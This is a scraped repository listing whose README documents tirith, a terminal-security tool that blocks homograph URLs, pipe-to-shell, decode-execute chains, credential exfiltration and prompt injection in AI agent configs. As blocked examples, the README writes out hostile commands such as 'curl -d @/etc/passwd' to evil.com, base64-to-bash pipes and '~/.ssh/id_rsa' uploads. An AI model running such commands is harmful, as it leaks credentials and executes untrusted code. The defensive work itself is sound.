[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-74668":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":10,"language":11,"languages":10,"totalLinesOfCode":10,"stars":12,"forks":13,"watchers":14,"openIssues":15,"contributorsCount":16,"subscribersCount":16,"size":16,"stars1d":17,"stars7d":18,"stars30d":19,"stars90d":16,"forks30d":16,"starsTrendScore":20,"compositeScore":21,"rankGlobal":10,"rankLanguage":10,"license":22,"archived":23,"fork":23,"defaultBranch":24,"hasWiki":23,"hasPages":23,"topics":25,"createdAt":10,"pushedAt":10,"updatedAt":36,"readmeContent":37,"aiSummary":38,"trendingCount":16,"starSnapshotCount":16,"syncStatus":39,"lastSyncTime":40,"discoverSource":41},74668,"tirith","sheeki03\u002Ftirith","sheeki03","Terminal security for developers and AI agents. Intercepts homograph URLs, pipe-to-shell, ANSI injection, obfuscated payloads, data exfiltration, and malicious AI skills\u002Fconfigs before they execute.","https:\u002F\u002Ftirith.sh",null,"Rust",2429,81,5,6,0,16,34,122,48,104.74,"GNU Affero General Public License v3.0",false,"main",[26,27,28,29,30,31,32,33,34,35],"cli","devtools","homograph-attack","rust","security","shell","supply-chain-security","terminal","unicode","url-security","2026-06-12 04:01:15","# tirith\n\n**Your browser would catch this. Your terminal won't.**\n\n\u003Cp align=\"center\">\n  \u003Cimg src=\"assets\u002Fcover.png\" alt=\"tirith — terminal security\" width=\"100%\" \u002F>\n\u003C\u002Fp>\n\n[![CI](https:\u002F\u002Fgithub.com\u002Fsheeki03\u002Ftirith\u002Factions\u002Fworkflows\u002Fci.yml\u002Fbadge.svg)](https:\u002F\u002Fgithub.com\u002Fsheeki03\u002Ftirith\u002Factions\u002Fworkflows\u002Fci.yml)\n[![GitHub Stars](https:\u002F\u002Fimg.shields.io\u002Fgithub\u002Fstars\u002Fsheeki03\u002Ftirith?style=flat&logo=github)](https:\u002F\u002Fgithub.com\u002Fsheeki03\u002Ftirith\u002Fstargazers)\n[![License: AGPL-3.0](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002Flicense-AGPL--3.0-blue)](LICENSE-AGPL)\n\n[Website](https:\u002F\u002Ftirith.sh) | [Docs](https:\u002F\u002Ftirith.sh\u002Fdocs) | [SKILL.md](SKILL.md) | [Changelog](https:\u002F\u002Fgithub.com\u002Fsheeki03\u002Ftirith\u002Freleases)\n\n---\n\nCan you spot the difference?\n\n```\n  curl -sSL https:\u002F\u002Finstall.example-cli.dev | bash     # safe\n  curl -sSL https:\u002F\u002Fіnstall.example-clі.dev | bash     # compromised\n```\n\nYou can't. Neither can your terminal. Both `і` characters are Cyrillic (U+0456), not Latin `i`. The second URL resolves to an attacker's server. The script executes before you notice.\n\nBrowsers solved this years ago. Terminals still render Unicode, ANSI escapes, and invisible characters without question. AI agents run shell commands and install packages without inspecting what's inside.\n\n**Tirith stands at the gate.** It intercepts commands, pasted content, and scanned files for homograph URLs, obfuscated payloads, credential exfiltration, malicious AI skills\u002Fconfigs, and known-bad packages\u002Fdomains\u002FIPs from a signed threat intelligence database before they execute.\n\n```bash\nbrew install sheeki03\u002Ftap\u002Ftirith\n```\n\nThen activate in your shell profile:\n\n```bash\n# zsh\neval \"$(tirith init --shell zsh)\"\n\n# bash\neval \"$(tirith init --shell bash)\"\n\n# fish\ntirith init --shell fish | source\n```\n\n> [!TIP]\n> `eval \"$(tirith init)\"` auto-detects your current shell (it inspects the parent process and falls back to `$SHELL` if needed). The explicit `--shell` flag is only required when you want to override the detection.\n\nThat's it. Every command you run is now guarded. Zero friction on clean input. Sub-millisecond overhead. You forget it's there until it saves you.\n\nAlso available via [npm](#cross-platform), [cargo](#cross-platform), [mise](#cross-platform), [apt\u002Fdnf](#linux-packages), and [more](#install).\n\n---\n\n## See it work\n\n**Homograph attack — blocked before execution:**\n\n```\n$ curl -sSL https:\u002F\u002Fіnstall.example-clі.dev | bash\n\ntirith: BLOCKED\n  [CRITICAL] non_ascii_hostname — Cyrillic і (U+0456) in hostname\n    This is a homograph attack. The URL visually mimics a legitimate\n    domain but resolves to a completely different server.\n  Bypass: prefix your command with TIRITH=0 (applies to that command only)\n```\n\nThe command never executes.\n\n**Pipe-to-shell with clean URL — warned, not blocked:**\n\n```\n$ curl -fsSL https:\u002F\u002Fget.docker.com | sh\n\ntirith: WARNING\n  [MEDIUM] pipe_to_interpreter — Download piped to interpreter\n    Consider downloading first and reviewing.\n```\n\nWarning prints to stderr. Command still runs.\n\n**Base64 decode-execute chain — blocked:**\n\n```\n$ echo payload | base64 -d | bash\n\ntirith: BLOCKED\n  [HIGH] base64_decode_execute — Base64 decode piped to interpreter\n  [HIGH] pipe_to_interpreter — Pipe to interpreter: base64 | bash\n```\n\nCatches decode chains through sudo\u002Fenv wrappers and PowerShell `-EncodedCommand` too.\n\n**Credential exfiltration — blocked:**\n\n```\n$ curl -d @\u002Fetc\u002Fpasswd https:\u002F\u002Fevil.com\u002Fcollect\n\ntirith: BLOCKED\n  [HIGH] data_exfiltration — Data exfiltration via curl upload\n    curl command uploads sensitive data to a remote server\n```\n\nCovers all curl\u002Fwget upload flags, env vars (`$AWS_SECRET_ACCESS_KEY`), and command substitution.\n\n**Malicious skill file — caught on scan:**\n\n```\n$ tirith scan evil_skill.py\n\ntirith scan: evil_skill.py — 3 finding(s)\n  [MEDIUM] dynamic_code_execution — exec() near b64decode() in close proximity\n  [MEDIUM] obfuscated_payload — Long base64 string decoded and executed\n  [MEDIUM] suspicious_code_exfiltration — HTTP call passes sensitive data as argument\n```\n\nScans JS\u002FPython files for obfuscated payloads, dynamic code execution, and secret exfiltration patterns.\n\n**Normal commands — invisible:**\n\n```\n$ git status\n$ ls -la\n$ docker compose up -d\n```\n\nNothing. Zero output. You forget tirith is running.\n\n---\n\n## What it catches\n\n**80+ detection rules across 15 categories.**\n\n| Category | What it stops |\n|----------|--------------|\n| **Homograph attacks** | Cyrillic\u002FGreek lookalikes in hostnames, punycode domains, mixed-script labels, lookalike TLDs, confusable domains, text-level confusable detection (math alphanumerics, same-word mixed-script) |\n| **Terminal injection** | ANSI escape sequences, bidi overrides, zero-width characters, unicode tags, invisible math operators, variation selectors, Hangul fillers |\n| **Steganography defense** | Invisible whitespace encoding (12 Unicode space variants), Mongolian Vowel Separator, Hangul Filler characters, math alphanumeric substitution — defenses against st3gg-style text steganography |\n| **Pipe-to-shell** | `curl \\| bash`, `wget \\| sh`, `httpie \\| sh`, `xh \\| sh`, `python \u003C(curl ...)`, `eval $(wget ...)` — every source-to-sink pattern |\n| **Base64 decode-execute** | `base64 -d \\| bash`, `python -c \"exec(b64decode(...))\"`, `powershell -EncodedCommand` — decode chains through sudo\u002Fenv wrappers |\n| **Data exfiltration** | `curl -d @\u002Fetc\u002Fpasswd`, `curl -T ~\u002F.ssh\u002Fid_rsa`, `wget --post-file`, env var uploads (`$AWS_SECRET_ACCESS_KEY`), command substitution exfil |\n| **Code file scanning** | Obfuscated payloads (`eval(atob(...))`), dynamic code execution (`exec(b64decode(...))`), secret exfiltration via `fetch`\u002F`requests.post` in JS\u002FPython files |\n| **Credential detection** | AWS keys, GitHub PATs, Stripe\u002FSlack\u002FSendGrid\u002FAnthropic\u002FGCP\u002Fnpm tokens, private key blocks, plus entropy-based generic secret detection |\n| **Post-compromise behavior** | Process memory scraping (`\u002Fproc\u002F*\u002Fmem`), Docker remote privilege escalation, credential file sweeps — calibrated against TeamPCP and UNC1069 post-compromise tooling |\n| **Command safety** | Dotfile overwrites, archive extraction to sensitive paths, cloud metadata endpoint access, private network access |\n| **Insecure transport** | Plain HTTP piped to shell, `curl -k`, disabled TLS verification, shortened URLs hiding destinations |\n| **Environment** | Proxy hijacking, sensitive env exports, code injection via env, interpreter hijack, shell injection env |\n| **Config file security** | Config injection, suspicious indicators, non-ASCII\u002Finvisible unicode in configs, MCP server security (insecure\u002Funtrusted\u002Fduplicate\u002Fpermissive) |\n| **Ecosystem threats** | Git clone typosquats, untrusted Docker registries, pip\u002Fnpm URL installs, web3 RPC endpoints, vet-not-configured |\n| **Path analysis** | Non-ASCII paths, homoglyphs in paths, double-encoding |\n| **Rendered content** | Hidden CSS\u002Fcolor content, hidden HTML attributes, comment content analysis (prompt injection at High, destructive commands at Medium) |\n| **Cloaking detection** | Server-side cloaking (bot vs browser), clipboard hidden content, PDF hidden text |\n\n---\n\n## Threat intelligence\n\nTirith ships a signed local threat database for package, hostname, and IP reputation. When a shell hook or `tirith check` sees a package install or suspicious infrastructure reference, it matches that input against the database before the command executes, instead of relying only on static heuristics.\n\n**Signed DB** (built daily by CI, verified on download and load):\n\n- Known-malicious packages from [OpenSSF Malicious Packages](https:\u002F\u002Fgithub.com\u002Fossf\u002Fmalicious-packages) and [Datadog Security Labs](https:\u002F\u002Fgithub.com\u002FDataDog\u002Fmalicious-software-packages-dataset)\n- Malicious IP infrastructure from [Feodo Tracker](https:\u002F\u002Ffeodotracker.abuse.ch\u002F) (abuse.ch)\n- Confirmed typosquats and popular-package baselines from [ecosyste.ms](https:\u002F\u002Fecosyste.ms\u002F)\n- [CISA Known Exploited Vulnerabilities](https:\u002F\u002Fwww.cisa.gov\u002Fknown-exploited-vulnerabilities-catalog) catalog for runtime advisory correlation\n\n**Optional supplemental feeds** (user-local overlay):\n\n- [URLhaus](https:\u002F\u002Furlhaus.abuse.ch\u002F) and [ThreatFox](https:\u002F\u002Fthreatfox.abuse.ch\u002F) via an abuse.ch auth key\n- [PhishTank](https:\u002F\u002Fphishtank.org\u002F) (Cisco Talos) and [Phishing Army](https:\u002F\u002Fphishing.army\u002F) blocklists\n- Tor exit node list from [Tor Project](https:\u002F\u002Fwww.torproject.org\u002F)\n\n**Optional live enrichment** during `tirith check` and daemon mode:\n\n- [OSV.dev](https:\u002F\u002Fosv.dev\u002F) advisory lookups (Google OSS)\n- [deps.dev](https:\u002F\u002Fdeps.dev\u002F) package health signals (Google OSS) and [ecosyste.ms](https:\u002F\u002Fecosyste.ms\u002F) maintainer data\n- [Google Safe Browsing](https:\u002F\u002Fsafebrowsing.google.com\u002F) URL reputation with your own API key\n\n```bash\ntirith threat-db update           # download + verify the signed DB\ntirith threat-db status           # age, signature, version, entry counts\n```\n\nBy default, shell hooks and `tirith check` trigger a cheap background refresh check every 24 hours. Daemon mode keeps the same enrichment path warm in the background.\n\nThis helps catch known-malicious packages, confirmed typosquats, slopsquatted package names, malicious download infrastructure, and packages with live OSV \u002F CISA KEV advisory data.\n\n**Attack families tirith is built for** (illustrative, not a caught-by-current-code claim):\n\n| Incident | Year | Attack shape |\n|---|---|---|\n| [Shai-Hulud npm worm](https:\u002F\u002Fsocket.dev\u002Fblog\u002Fshai-hulud-worm) | 2025 | Self-propagating package malware; exfiltrated GitHub tokens and AWS keys from 180+ packages, published findings to public `Shai-Hulud` repos |\n| [Slopsquatting](https:\u002F\u002Fsocket.dev\u002Fblog\u002Fslopsquatting-how-ai-hallucinations-are-fueling-a-new-class-of-supply-chain-attacks) | 2023–ongoing | Attackers register LLM-hallucinated package names on npm \u002F PyPI \u002F crates.io; [USENIX 2025](https:\u002F\u002Fwww.usenix.org\u002Fsystem\u002Ffiles\u002Fconference\u002Fusenixsecurity25\u002Fsec25cycle1-prepub-742-spracklen.pdf) found 58% of hallucinated names repeat across runs |\n| Team PCP \u002F UNC1069 tooling | ongoing | Post-compromise credential sweeps, `\u002Fproc\u002F*\u002Fmem` scraping, Docker privilege escalation |\n| [colors.js \u002F faker.js sabotage](https:\u002F\u002Fsnyk.io\u002Fblog\u002Fopen-source-npm-packages-colors-faker\u002F) | 2022 | Author self-sabotage of widely-used packages |\n| [event-stream compromise](https:\u002F\u002Fgithub.com\u002Fdominictarr\u002Fevent-stream\u002Fissues\u002F116) | 2018 | Transferred ownership to attacker; payload targeted Bitcoin wallets |\n\nPackage-name extraction currently covers language ecosystems (pip, npm\u002Fyarn\u002Fpnpm\u002Fbun, cargo, gem, go, composer, dotnet, mvn\u002Fgradle), not distro-level package managers (`apt` \u002F `dnf` \u002F `yum` \u002F `pacman`). That's why xz-utils, which entered through Linux distro tarballs, is not in the table despite being a headline incident.\n\n---\n\n## AI agent security\n\nTirith protects AI coding agents at every layer — from the configs they read to the commands they execute.\n\n### Shell hooks — passive command interception\n\nWhen AI agents execute shell commands (Claude Code, Codex, Cursor, etc.), tirith's shell hooks intercept every command before it runs. No agent-side configuration needed — if the hook is active in the shell, all commands are guarded:\n\n- **Blocks dangerous commands** — homograph URLs, pipe-to-shell, insecure downloads\n- **Blocks malicious paste** — ANSI injection, bidi attacks, hidden multiline in pasted content\n- **Works with every agent** — any tool that spawns a shell inherits tirith protection\n- **Zero agent modification** — the agent doesn't know tirith exists until a command is blocked\n\nUse `tirith setup \u003Ctool>` for one-command configuration (see [AI Agent Integrations](#ai-agent-integrations)).\n\n### MCP server (7 tools)\n\nRun `tirith mcp-server` or use `tirith setup \u003Ctool> --with-mcp` to register tirith as an MCP server. AI agents can call these tools before taking action:\n\n| Tool | What it does |\n|------|-------------|\n| `tirith_check_command` | Analyze shell commands for pipe-to-shell, homograph URLs, env injection |\n| `tirith_check_url` | Score URLs for homograph attacks, punycode tricks, shortened URLs, raw IPs |\n| `tirith_check_paste` | Check pasted content for ANSI escapes, bidi controls, zero-width chars |\n| `tirith_scan_file` | Scan a file for hidden content, invisible Unicode, config poisoning |\n| `tirith_scan_directory` | Recursive scan with AI config file prioritization |\n| `tirith_verify_mcp_config` | Validate MCP configs for insecure servers, shell injection in args, wildcard tools |\n| `tirith_fetch_cloaking` | Detect server-side cloaking (different content for bots vs browsers) |\n\n### Config file scanning\n\n`tirith scan` detects prompt injection and hidden payloads in AI config files. It prioritizes and scans 50+ known AI config file patterns:\n\n- `.cursorrules`, `.windsurfrules`, `.clinerules`, `CLAUDE.md`, `copilot-instructions.md`\n- `.claude\u002F` settings, agents, skills, plugins, rules\n- `.cursor\u002F`, `.vscode\u002F`, `.windsurf\u002F`, `.cline\u002F`, `.continue\u002F`, `.roo\u002F`, `.codex\u002F` configs\n- `mcp.json`, `.mcp.json`, `mcp_settings.json`\n- `.github\u002Fcopilot-instructions.md`, `.github\u002Fagents\u002F*.md`\n\n**What it catches in configs:**\n\n- **Prompt injection** — skill activation triggers, permission bypass attempts, safety dismissal, identity reassignment, cross-tool override instructions\n- **Invisible Unicode** — zero-width characters (including Mongolian Vowel Separator), bidi controls, soft hyphens, Unicode tags, Hangul fillers, invisible whitespace encoding, math alphanumeric confusables\n- **MCP config issues** — insecure HTTP connections, raw IP servers, shell metacharacters in args, duplicate server names, wildcard tool access\n\n### Hidden content detection\n\nDetects content invisible to humans but readable by AI in HTML, Markdown, and PDF:\n\n- **CSS hiding** — `display:none`, `visibility:hidden`, `opacity:0`, `font-size:0`, off-screen positioning\n- **Color hiding** — white-on-white text, similar foreground\u002Fbackground (contrast ratio \u003C 1.5:1)\n- **HTML\u002FMarkdown comments** — prompt injection phrases (High), destructive commands like `rm -rf` or `curl|bash` (Medium), long comments hiding instructions (Low)\n- **PDF hidden text** — sub-pixel rendered text (font-size \u003C 1px) invisible to readers but parseable by LLMs\n\n### Cloaking detection\n\n`tirith fetch` compares server responses across 6 user-agents (Chrome, ClaudeBot, ChatGPT-User, PerplexityBot, Googlebot, curl) to detect when servers serve different content to AI bots vs browsers.\n\n---\n\n## Install\n\n### macOS\n\n**Homebrew:**\n\n```bash\nbrew install sheeki03\u002Ftap\u002Ftirith\n```\n\n### Linux Packages\n\n**Debian \u002F Ubuntu (.deb):**\n\nDownload from [GitHub Releases](https:\u002F\u002Fgithub.com\u002Fsheeki03\u002Ftirith\u002Freleases\u002Flatest), then:\n\n```bash\nsudo dpkg -i tirith_*_amd64.deb\n```\n\n**Fedora \u002F RHEL \u002F CentOS 9+ (.rpm):**\n\nDownload from [GitHub Releases](https:\u002F\u002Fgithub.com\u002Fsheeki03\u002Ftirith\u002Freleases\u002Flatest), then:\n\n```bash\nsudo dnf install .\u002Ftirith-*.rpm\n```\n\n**Arch Linux (AUR):**\n\n```bash\nyay -S tirith\n# or: paru -S tirith\n```\n\n**Nix:**\n\n```bash\nnix profile install nixpkgs#tirith              # from nixpkgs\nnix profile install github:sheeki03\u002Ftirith      # from upstream flake\n# or try without installing: nix run github:sheeki03\u002Ftirith -- --version\n```\n\n### Windows\n\nAll core features work on Windows including detection, scanning, webhooks, policy management, and audit uploads. Shell hooks support PowerShell. Daemon mode and `tirith setup` are Unix-only for now.\n\n**Scoop:**\n\n```powershell\nscoop bucket add tirith https:\u002F\u002Fgithub.com\u002Fsheeki03\u002Fscoop-tirith\nscoop install tirith\n```\n\n**Chocolatey** (under moderation — pending approval):\n\n```powershell\nchoco install tirith\n```\n\n### Cross-Platform\n\n**npm:**\n\n```bash\nnpm install -g tirith\n```\n\n**Cargo:**\n\n```bash\ncargo install tirith\n```\n\n**[Mise](https:\u002F\u002Fmise.jdx.dev\u002F)** (official registry):\n\n```bash\nmise use -g tirith\n```\n\n**asdf:**\n\n```bash\nasdf plugin add tirith https:\u002F\u002Fgithub.com\u002Fsheeki03\u002Fasdf-tirith.git\nasdf install tirith latest\nasdf global tirith latest\n```\n\n**Docker:**\n\n```bash\ndocker run --rm ghcr.io\u002Fsheeki03\u002Ftirith check -- \"curl https:\u002F\u002Fexample.com | bash\"\n```\n\n### Activate\n\nAdd to your shell profile (`.zshrc`, `.bashrc`, or `config.fish`):\n\n```bash\neval \"$(tirith init --shell zsh)\"   # in ~\u002F.zshrc\neval \"$(tirith init --shell bash)\"  # in ~\u002F.bashrc\ntirith init --shell fish | source   # in ~\u002F.config\u002Ffish\u002Fconfig.fish\n```\n\n| Shell | Hook type | Tested on |\n|-------|-----------|-----------|\n| zsh | preexec + paste widget | 5.8+ |\n| bash | preexec (two modes) | 5.0+ |\n| fish | fish_preexec event | 3.5+ |\n| PowerShell | PSReadLine handler | 7.0+ |\n\nBash uses enter mode by default with automatic fallback to preexec on failure. See [troubleshooting](docs\u002Ftroubleshooting.md#unexpected-tirith-exit-codes) for details on error handling and SSH fallback behavior.\n\n> [!WARNING]\n> Bash's default preexec mode warns but cannot block in-place. Set `TIRITH_BASH_PREEXEC_ENFORCE=1` for real blocking via `shopt -s extdebug`. Enforcement refuses to activate when `HISTCONTROL` contains `ignorespace` \u002F `ignoredups` \u002F `ignoreboth`, any `HISTIGNORE` is set, or `set +o history` is active — those make the block racy.\n\n#### Enforcement by shell\n\n| Shell | Behavior |\n|---|---|\n| bash **enter mode** | **Reliable blocking.** Binds Enter; can stop a command before bash commits to running it. |\n| bash **preexec + `TIRITH_BASH_PREEXEC_ENFORCE=1`** | **Conditional blocking.** Uses `shopt -s extdebug`; blocks when bash's `history` can provide a trustworthy whole-line view. Downgrades to warn-only with a pointer at enter mode when history is filtered (`HISTCONTROL=ignorespace\u002Fignoredups\u002Fignoreboth`, any `HISTIGNORE`, or `set +o history`) or an alias \u002F command substitution \u002F `eval` makes the typed line drift from `BASH_COMMAND`. |\n| bash **preexec** (default, no enforce flag) | Warn-only. Prints a DETECTED banner on risky commands; does not block. |\n| zsh, fish, powershell | Reliable blocking via native preexec hooks. |\n| nushell | Warn-only (does not currently support command interception). |\n\nIf you need guaranteed line-level blocking on bash, use enter mode. Use preexec enforce for \"blocks when possible; tells you honestly when it can't.\"\n\n**Nix \u002F Home-Manager:** tirith must be in your `$PATH` — the shell hooks call `tirith` by name at runtime. Adding it to `initContent` alone is not enough.\n\n```nix\nhome.packages = [ pkgs.tirith ];\n\nprograms.zsh.initContent = ''\n  eval \"$(tirith init --shell zsh)\"\n'';\n```\n\n### Shell Integrations\n\n**Oh-My-Zsh:**\n\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002Fsheeki03\u002Fohmyzsh-tirith \\\n  ${ZSH_CUSTOM:-~\u002F.oh-my-zsh\u002Fcustom}\u002Fplugins\u002Ftirith\n\n# Add tirith to plugins in ~\u002F.zshrc:\nplugins=(... tirith)\n```\n\n### AI Agent Integrations\n\nUse `tirith setup \u003Ctool>` for one-command configuration:\n\n```bash\ntirith setup claude-code --with-mcp   # Claude Code + MCP server\ntirith setup codex                    # OpenAI Codex\ntirith setup copilot-cli              # GitHub Copilot CLI (run from repo root)\ntirith setup cursor                   # Cursor\ntirith setup gemini-cli --with-mcp    # Gemini CLI + MCP server\ntirith setup kiro                     # Kiro CLI (formerly Amazon Q)\ntirith setup pi-cli                   # Pi CLI\ntirith setup vscode                   # VS Code\ntirith setup windsurf                 # Windsurf\n```\n\nFor manual configuration, see `mcp\u002Fclients\u002F` for per-tool guides.\n\n### CI\u002FCD Integration\n\n**GitHub Action** with SARIF upload to GitHub Security tab:\n\n```yaml\n- uses: sheeki03\u002Ftirith@v1\n  with:\n    fail_on: high\n    sarif: true\n```\n\nAlso available as a **pre-commit hook** — see `.pre-commit-hooks.yaml` in this repo.\n\nScan supports `--include`, `--exclude`, `--profile` (loads named profiles from policy), and `--ignore` filters for targeted CI scanning.\n\n### Rule Documentation\n\n```bash\ntirith explain --rule pipe_to_interpreter   # severity, examples, remediation, MITRE ATT&CK\ntirith explain --list --category terminal   # all rules in a category\n```\n\n### Daemon Mode (Unix)\n\nOptional background process for sub-millisecond latency and network-aware enrichment (shortened URL resolution, DNS blocklist checks):\n\n```bash\ntirith daemon start       # tirith check auto-delegates when running\ntirith daemon stop\n```\n\n> [!NOTE]\n> Daemon mode is Unix-only today.\n\n---\n\n## Commands\n\n| Command | What it does |\n|---------|-------------|\n| `tirith check -- \u003Ccmd>` | Analyze a command without executing it |\n| `tirith paste` | Check pasted content (called automatically by shell hooks) |\n| `tirith scan [path]` | Scan files\u002Fdirectories with `--include`, `--exclude`, `--profile`, `--format sarif`, `--ci` |\n| `tirith threat-db update` | Download, verify, and install the signed threat database |\n| `tirith threat-db status` | Show DB age, signature status, version, and entry counts |\n| `tirith explain --rule \u003Cid>` | Show documentation, examples, and remediation for any detection rule |\n| `tirith policy init` | Generate a starter `.tirith\u002Fpolicy.yaml` in your repo |\n| `tirith policy validate` | Validate policy YAML for syntax, schema, and conflicts |\n| `tirith policy test \u003Ccmd>` | Dry-run a command or file against your policy with match trace |\n| `tirith run \u003Curl>` | Safe `curl \\| bash` replacement. Downloads, analyzes, reviews, then executes |\n| `tirith score \u003Curl>` | Break down a URL's trust signals |\n| `tirith diff \u003Curl>` | Byte-level comparison showing where suspicious characters hide |\n| `tirith fetch \u003Curl>` | Detect server-side cloaking (different content for bots vs browsers) |\n| `tirith why` | Explain the last rule that triggered |\n| `tirith doctor` | Diagnose installation, hooks, and policy |\n| `tirith doctor --fix` | Auto-fix detected issues (hooks, policy, AI tool setup) |\n| `tirith daemon start` | Start background daemon for faster checks (Unix) |\n| `tirith receipt {last,list,verify}` | Track and verify scripts run through `tirith run` |\n| `tirith checkpoint {create,restore,diff}` | Snapshot files before risky operations, roll back if needed |\n| `tirith setup \u003Ctool>` | One-command setup for AI coding tools (see [AI Agent Integrations](#ai-agent-integrations)) |\n| `tirith gateway run` | MCP gateway proxy for intercepting AI agent shell tool calls |\n| `tirith warnings` | Show accumulated session warnings, suggest trust entries. `--summary` for shell exit hooks |\n| `tirith audit {export,stats,report}` | Audit log management for compliance |\n| `tirith init` | Print the shell hook for your shell profile |\n| `tirith mcp-server` | Run as MCP server over JSON-RPC stdio |\n\n---\n\n## Design principles\n\n- **Offline by default** — `check`, `paste`, `score`, `diff`, and `why` make zero network calls. All detection runs locally.\n- **No command rewriting** — tirith never modifies what you typed\n- **No telemetry** — no analytics, no crash reporting, no phone-home behavior\n- **No background processes by default** — invoked per-command, exits immediately. Optional `tirith daemon start` keeps patterns warm for faster checks.\n- **Network only when you ask or configure it** — `run`, `fetch`, and `audit report --upload` reach the network on explicit invocation. Daemon mode adds network-aware URL resolution. Optional webhook and policy-server integrations can also make outbound requests when configured. Core detection itself does not phone home.\n\n---\n\n## Configuration\n\n### Quick start\n\n```bash\ntirith policy init          # creates .tirith\u002Fpolicy.yaml in your repo\ntirith policy validate      # check for syntax\u002Fschema errors\ntirith policy test \"curl https:\u002F\u002Fexample.com | bash\"  # dry-run against policy\n```\n\n### Policy file\n\nTirith uses a YAML policy file. Discovery order:\n1. `.tirith\u002Fpolicy.yaml` in current directory (walks up to repo root)\n2. `~\u002F.config\u002Ftirith\u002Fpolicy.yaml`\n\n```yaml\nfail_mode: open        # or \"closed\" for strict environments\nparanoia: 1            # 1-4: higher = more sensitive\nstrict_warn: false     # require explicit acknowledgement for warnings\n\nallowlist:\n  - \"get.docker.com\"\n  - \"sh.rustup.rs\"\n\nblocklist:\n  - \"evil.example.com\"\n\nseverity_overrides:\n  docker_untrusted_registry: CRITICAL\n\nscan:\n  ignore_patterns:\n    - \"node_modules\"\n    - \"target\"\n  profiles:\n    ci:\n      include: [\"*.md\", \"*.json\", \"*.yaml\", \".claude\u002F*\"]\n      fail_on: high\n```\n\nUse `allowlist_rules` for rule-scoped suppressions when you trust a source for one rule but do not want to globally allowlist it:\n\n```yaml\nallowlist_rules:\n  - rule_id: curl_pipe_shell\n    patterns:\n      - \"get.docker.com\"\n```\n\n### Escalation and action overrides\n\nWarnings are tracked per session. If the same rule fires repeatedly, escalation rules can upgrade to a block:\n\n```yaml\naction_overrides:\n  shortened_url: block            # always block, regardless of default severity\n\nescalation:\n  - trigger: repeat_count\n    rule_ids: [\"*\"]               # any rule\n    threshold: 5\n    window_minutes: 60\n    action: block\n  - trigger: multi_medium\n    min_findings: 3               # 3+ medium findings on one command → block\n    action: block\n```\n\nReview accumulated warnings at any time:\n\n```bash\ntirith warnings               # table of session warnings\ntirith warnings --format json # structured output\ntirith warnings --clear       # clear after viewing\n```\n\nOn shell exit, a one-line summary is printed if any warnings were recorded during the session.\n\nMore examples in [docs\u002Fcookbook.md](docs\u002Fcookbook.md).\n\n### Strict warn mode\n\nWith `strict_warn: true` (or `--strict-warn` on the CLI), medium-risk findings prompt for explicit acknowledgement in interactive terminals instead of silently warning:\n\n```\n$ curl -sSL https:\u002F\u002Fget.docker.com | sh\n\ntirith: WARNING\n  [MEDIUM] pipe_to_interpreter — Download piped to interpreter\ntirith: proceed with 1 warning(s)? [y\u002FN]\n```\n\nShell hooks use exit code 3 for the warn-ack protocol. Old hooks that don't know about exit code 3 fall through to fail-open behavior.\n\n> [!NOTE]\n> Exit code 3 is the warn-ack hook protocol path, not the normal direct-CLI contract. Non-hook callers should not normally see exit code 3; if they do, it indicates acknowledgement is required.\n\n### Bypass\n\nFor the rare case you know exactly what you're doing:\n\n```bash\nTIRITH=0 curl -L https:\u002F\u002Fsomething.xyz | bash\n```\n\nThis is a standard shell per-command prefix — the variable only exists for that single command and does not persist in your session. Organizations can disable this entirely: `allow_bypass_env: false` in policy.\n\n> [!CAUTION]\n> `TIRITH=0` is per-command. Do not export it in shell profiles, dotfiles, or CI config — a permanent bypass defeats the entire protection model. If you find yourself reaching for it often, add the trusted source to `allowlist` in your policy file instead.\n\n---\n\n## Data handling\n\nLocal JSONL audit log at `~\u002F.local\u002Fshare\u002Ftirith\u002Flog.jsonl`:\n- Timestamp, session ID, action, rule IDs, redacted command preview\n- Raw detection data (`raw_action`, `raw_rule_ids`) preserved alongside enforced action for coverage auditing\n- Session warning state at `~\u002F.local\u002Fstate\u002Ftirith\u002Fsessions\u002F`\n- **No** full commands, environment variables, or file contents\n\nDisable: `export TIRITH_LOG=0`\n\n---\n\n## Docs\n\n- [Threat model](docs\u002Fthreat-model.md) — what tirith defends against and what it doesn't\n- [Cookbook](docs\u002Fcookbook.md) — policy examples for common setups\n- [Troubleshooting](docs\u002Ftroubleshooting.md) — shell quirks, latency, false positives\n- [Compatibility](docs\u002Fcompatibility.md) — stable vs experimental surface\n- [Security policy](SECURITY.md) — vulnerability reporting\n- [Uninstall](docs\u002Funinstall.md) — clean removal per shell and package manager\n\n## License\n\n**Core security coverage ships in the open-source tree.** All 80+ detection rules and the MCP server are available from source. The repository still contains legacy licensing and policy-server code paths, so avoid assuming that every runtime path is already tier-free.\n\ntirith is dual-licensed:\n\n- **AGPL-3.0-only**: [LICENSE-AGPL](LICENSE-AGPL) — free under copyleft terms\n- **Commercial**: [LICENSE-COMMERCIAL](LICENSE-COMMERCIAL) — if AGPL copyleft obligations don't work for your use case, contact contact@tirith.sh for alternative licensing\n\nThird-party data attributions in [NOTICE](NOTICE).\n\n## Star History\n\n[![Star History Chart](https:\u002F\u002Fapi.star-history.com\u002Fsvg?repos=sheeki03\u002Ftirith&type=Date)](https:\u002F\u002Fstar-history.com\u002F#sheeki03\u002Ftirith&Date)\n","Tirith 是一个为开发者和AI代理设计的终端安全工具，能够拦截同形文字URL、管道到shell命令、ANSI注入、混淆负载、数据泄露以及恶意AI技能\u002F配置等威胁。项目使用Rust语言编写，具有高效性和安全性，能够在命令执行前进行拦截检查，从而防止潜在的安全风险。适用于任何需要增强终端安全性的场景，特别是当用户经常通过终端运行来自网络的脚本或依赖外部资源时。Tirith易于安装并支持多种操作系统平台，几乎不增加额外的操作负担，确保在不影响用户体验的同时提供强大的保护。",2,"2026-06-11 03:50:20","high_star"]